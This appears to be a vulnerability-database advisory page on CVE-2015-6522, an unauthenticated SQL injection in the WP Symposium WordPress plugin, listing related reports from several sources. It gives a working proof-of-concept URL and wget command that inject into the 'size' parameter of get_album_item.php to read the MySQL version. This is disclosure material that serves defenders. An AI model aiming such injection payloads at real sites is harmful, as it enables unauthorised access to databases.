Unauthenticated SQL Injection in WP Symposium plugin 15.5.
Reporter | Title | Published | Views | Family All 12 |
---|---|---|---|---|
![]() | CVE-2015-6522 | 19 Aug 201515:00 | โ | cvelist |
![]() | WordPress WP Symposium Multiple SQL Injection Vulnerabilities | 24 Aug 201500:00 | โ | openvas |
![]() | CVE-2015-6522 | 19 Aug 201515:59 | โ | cve |
![]() | WordPress Symposium Plugin <= 15.7- SQL Injection | 19 Aug 201500:00 | โ | patchstack |
![]() | WordPress Symposium Plugin 15.1 - SQL Injection #2 | 18 Aug 201500:00 | โ | patchstack |
![]() | WordPress WP SymposiumๆไปถSQLๆณจๅ ฅๆผๆด | 2 Sep 201500:00 | โ | seebug |
![]() | CVE-2015-6522 | 19 Aug 201515:59 | โ | nvd |
![]() | WordPress Symposium Plugin SQL Injection (CVE-2015-6522) | 8 Dec 201600:00 | โ | checkpoint_advisories |
![]() | Sql injection | 19 Aug 201515:59 | โ | prion |
![]() | WP Symposium <= 15.5.1 - Unauthenticated SQL Injection | 9 Aug 201500:00 | โ | wpvulndb |
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo